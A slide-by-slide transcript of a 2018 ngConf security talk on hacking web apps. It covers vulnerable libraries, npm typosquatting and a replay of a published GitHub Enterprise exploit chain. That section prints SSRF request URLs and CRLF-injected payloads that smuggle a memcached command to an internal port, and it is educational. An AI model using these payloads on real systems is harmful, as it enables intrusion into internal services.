Upgrade to Pro — share decks privately, control downloads, hide ads and more …

How to hack an Angular app? - ngConf 2018

How to hack an Angular app? - ngConf 2018

How to hack an Angular app? - ngConf 2018

Bbc0c41f72dffc7701986e7ef58e3bbe?s=128

Asim Hussain

April 18, 2018
Tweet

Transcript

  1. How to hack an Angular app? @jawache ngConf 2018

  2. How to hack a web app? @jawache ngConf 2018

  3. Real Life Hacking Stories @jawache ngConf 2018

  4. Asim Hussain @jawache codecraft.tv microsoft.com

  5. None
  6. Vulnerability vs. Exploit

  7. @jawache #1

  8. @jawache Photo by Kristina Flour on Unsplash 0 Day Exploit

  9. @jawache Photo by Veri Ivanova on Unsplash 0 Day Exploit

  10. None
  11. @jawache

  12. @jawache

  13. @jawache

  14. @jawache

  15. "12 of top 50 data breaches were through known vulnerabilities"

    - snyk.io https://snyk.io/blog/owasp-top-10-breaches/ @jawache
  16. "77% of 433,000 Sites Use Vulnerable JavaScript Libraries" - snyk.io

    https://snyk.io/blog/77-percent-of-sites-still-vulnerable/ @jawache
  17. None
  18. @jawache

  19. @jawache nsp

  20. @jawache Photo by energepic.com from Pexels Summary

  21. #2 @orange_8361

  22. None
  23. git push @jawache http://example.com

  24. @jawache git push http://0

  25. @jawache git push http://0:8000/composer/send_email

  26. def send_email(request): try: recipients = request.GET['to'].split(',') url = request.GET['url'] proto,

    server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse() ... @jawache
  27. http://0:8000/composer/send_email? to=orange@nogg& url=http://127.0.0.1:12345/foo @jawache

  28. def send_email(request): try: recipients = request.GET['to'].split(',') url = request.GET['url'] proto,

    server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse() ... @jawache
  29. \r\n @jawache

  30. %0D%0A @jawache

  31. http://127.0.0.1:12345/%0D%0Ahello%0D%0AFoo: @jawache

  32. GET /%0D%0Ahello%0D%0AFoo: HTTP/1.1 Host: 127.0.0.1:12345 Accept-Encoding: identity @jawache

  33. GET /%0D%0Ahello%0D%0AFoo:\r\n HTTP/1.1\r\n Host: 127.0.0.1:12345\r\n Accept-Encoding: identity\r\n \r\n \r\n @jawache

  34. @jawache GET /\r\n hello\r\n Foo: HTTP/1.1\r\n Host: 127.0.0.1:12345\r\n Accept-Encoding: identity\r\n

    \r\n \r\n
  35. ...:11211/%0D%0Aset%20key%200%20900%204%20data%0D%0A @jawache

  36. GET / set key 0 900 4 data HTTP/1.1 Host:

    127.0.0.1:11211 Accept-Encoding: identity @jawache
  37. code code @jawache

  38. code code @jawache

  39. @jawache Photo by Kelly Sikkema on Unsplash Summary

  40. #3 @jawache

  41. @jawache

  42. @jawache

  43. None
  44. @jawache

  45. cross-env vs. crossenv @jawache

  46. @jawache Photo by Jairo Alzate on Unsplash Summary

  47. @scope/package-name @jawache

  48. package-name packagename package.name @jawache

  49. Update Small vulnerability Don't trust anyone All the things Fix

    @jawache
  50. Asim Hussain @jawache codecraft.tv microsoft.com

  51. #1 How I Chained 4 vulnerabilities on GitHub Enterprise -

    Orange Tsai http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html CRLF injection vulnerability in the HTTPConnection https://www.cvedetails.com/cve/CVE-2016-5699/
  52. #2 Exploit DB https://www.exploit-db.com/ Metasploit https://www.metasploit.com/ Azure App Services https://aka.ms/azure-app-service-docs

    Google App Engine https://cloud.google.com/appengine/ Heroku https://heroku.com Amazon Beanstack http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html The Equifax hack and how to protect your family — all explained in 5 minutes https://medium.freecodecamp.org/the-equifax-hack-and-how-to-protect-your-family-all-explained-in-5-minutes-a2b5187cb6c0
  53. #3 Oscar Bolmsten on Twitter https://twitter.com/o_cee/status/892306836199800836 Malicious packages in npm.

    Here’s what to do - Ivan Akulov https://iamakulov.com/notes/npm-malicious-packages/